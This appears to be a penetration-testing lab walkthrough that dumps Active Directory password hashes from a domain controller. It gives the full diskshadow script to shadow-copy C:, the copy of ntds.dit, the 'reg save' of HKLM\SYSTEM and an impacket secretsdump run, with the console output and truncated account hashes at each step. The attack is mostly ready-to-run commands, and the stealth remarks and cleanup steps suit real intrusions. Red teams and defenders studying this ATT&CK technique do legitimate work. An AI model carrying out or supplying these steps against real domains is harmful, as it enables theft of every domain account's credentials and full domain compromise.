===================================================================================================================================
OS Credential Dumping (NTDS) using the Windows tool 'Diskshadow'
===================================================================================================================================

The objective is to extract the password hashes of all the domain accounts that are stored in the NTDS.dit file of a Domain Controller.
A valid domain account with high privileges (e.g. member of the 'Domain admins' group or the 'Administrators' group of the Domain Controller)
is required to dump the NTDS.dit file and the registry hive 'HKLM\SYSTEM'.
By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\NTDS\ntds.dit of a domain controller.

> Usefull link: https://attack.mitre.org/techniques/T1003/003/

The in-built Windows tool 'diskshadow.exe' can copy the NTDS file (ntdis.dit) using the "Volume Shadow Service (VSS)".
DiskShadow.exe is included with the Windows Server operating system since 2008.
It has very similar capabilities than 'VShadow.exe'.

--------------------------------------------------------------------------------------------------------
Step 1. Log into the Domain Controller with a privileged account (e.g. Domain Admin)
--------------------------------------------------------------------------------------------------------

Multiple options exist:
-----------------------
> RDP
> PowerShell remoting
> Wmiexec (not very stealth)
> ...

--------------------------------------------------------------------------------------------------------
Step 2. Use the in-built windows tool 'diskshadow.exe' to copy the NTDS file (ntds.dit)
--------------------------------------------------------------------------------------------------------

> First, create a shadowdisk script (here named 'Diskshadow.txt') instructing to create a new shadow disk copy 
  of the local disk 'C:' and expose it as the drive 'Z:'.
    
    PS C:\temp> type .\Diskshadow.txt
    
        set context persistent nowriters
        set metadata c:\temp\Test\metadata.cab
        add volume c: alias test
        create
        expose %test% z:


    PS C:\temp> mkdir Test
    
        Directory: C:\temp
    
    Mode                LastWriteTime     Length Name
    ----                -------------     ------ ----
    d----         2/27/2024  12:26 AM            Test


> Then, execute the script with the tool shadowdisk.

    PS C:\temp> diskshadow.exe /s .\Diskshadow.txt

    Microsoft DiskShadow version 1.0
    Copyright (C) 2013 Microsoft Corporation
    On computer:  TEMP-DC,  2/27/2024 12:31:29 AM
    
    -> set context persistent nowriters
    -> set metadata c:\temp\Test\metadata.cab
    The existing file will be overwritten.
    -> add volume c: alias test
    -> create
    Alias test for shadow ID {aed7b38e-c213-4419-85bc-5c0ef848b1c6} set as environment variable.
    Alias VSS_SHADOW_SET for shadow set ID {492e415e-8da1-4872-af87-c4c8ae84d81a} set as environment variable.
    
    Querying all shadow copies with the shadow copy set ID {492e415e-8da1-4872-af87-c4c8ae84d81a}
    
            * Shadow copy ID = {aed7b38e-c213-4419-85bc-5c0ef848b1c6}               %test%
                    - Shadow copy set: {492e415e-8da1-4872-af87-c4c8ae84d81a}       %VSS_SHADOW_SET%
                    - Original count of shadow copies = 1
                    - Original volume name: \\?\Volume{43f4e5b7-6e31-11e8-80b1-806e6f6e6963}\ [C:\]
                    - Creation time: 2/27/2024 12:31:30 AM
                    - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
                    - Originating machine: TEMP-DC.Security-Test-Lab.Local
                    - Service machine: TEMP-DC.Security-Test-Lab.Local
                    - Not exposed
                    - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                    - Attributes:  No_Auto_Release Persistent No_Writers Differential
    
    Number of shadow copies listed: 1
    -> expose %test% z:
    -> %test% = {aed7b38e-c213-4419-85bc-5c0ef848b1c6}
    The shadow copy was successfully exposed as z:\.


> Finally, copy the NTDS file and delete the shadow copy that we created.

    PS C:\temp> cmd.exe /c copy z:\windows\ntds\ntds.dit C:\temp\Test\ntds.dit
            1 file(s) copied.
    
    PS C:\temp> ls .\Test\
    
        Directory: C:\temp\Test
    
    Mode                LastWriteTime     Length Name
    ----                -------------     ------ ----
    -a---         2/27/2024  12:31 AM        673 metadata.cab
    -a---         2/26/2024  11:10 PM   62930944 ntds.dit


    PS C:\temp> diskshadow.exe

    Microsoft DiskShadow version 1.0
    Copyright (C) 2013 Microsoft Corporation
    On computer:  TEMP-DC,  2/27/2024 12:32:49 AM
    
    DISKSHADOW> delete shadows volume Test
      Deleting shadow copy {cc25d895-8c86-4c43-bfcd-5c5f385758e5} on volume \\?\Volume{43f4e5b7-6e31-11e8-80b1-806e6f6e6963}\
      from provider {b5946137-7b9f-4925-af80-51abd60b20d5} [Attributes: 0x00020019]...
      Deleting shadow copy {aed7b38e-c213-4419-85bc-5c0ef848b1c6} on volume \\?\Volume{43f4e5b7-6e31-11e8-80b1-806e6f6e6963}\
      from provider {b5946137-7b9f-4925-af80-51abd60b20d5} [Attributes: 0x00120019]...
      Number of shadow copies deleted: 2
    DISKSHADOW> reset
    DISKSHADOW> exit


--------------------------------------------------------------------------------------------------------
Step 3. Copy the registry hive HKLM\SYSTEM using the native command 'reg save'
--------------------------------------------------------------------------------------------------------

PS C:\temp\Test> reg save HKLM\SYSTEM  C:\temp\Test\system
The operation completed successfully.

PS C:\temp\Test> ls

    Directory: C:\temp\Test

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---         2/27/2024  12:31 AM        673 metadata.cab
-a---         2/26/2024  11:10 PM   62930944 ntds.dit
-a---         2/27/2024  12:34 AM   11046912 system


-----------------------------------------------------------------------------------------------------------------
Step 4. Download the files on a Kali linux VM and use the tool 'Secretsdump.py' (impacket) to extract the hashes
-----------------------------------------------------------------------------------------------------------------

The impacket secretsdump module can be used to perform various tasks including extraction of contents of the NTDS file. 
It requires the registry hive "SYSTEM" and the NTDS.dit database file.

$ python3 secretsdump.py -ntds ntds.dit -system system -user-status LOCAL

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x941140bd825386b732031d5c5b01ae8a
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: b175740e0908fe396a15b0dc5631e72a
[*] Reading and decrypting hashes from C:\temp\NTDS_saved\Active Directory\ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b12f3e7c840d169bfec<SNIP>
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c<SNIP>
backup:1008:aad3b435b51404eeaad3b435b51404ee:2a20fcdf23e0e34d487abbc82<SNIP>
TEMP-DC$:1009:aad3b435b51404eeaad3b435b51404ee:dbc0132186327bcb1e48a1b<SNIP>
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:208ae4a2c5aa7b40d047349940<SNIP>
<SNIP>
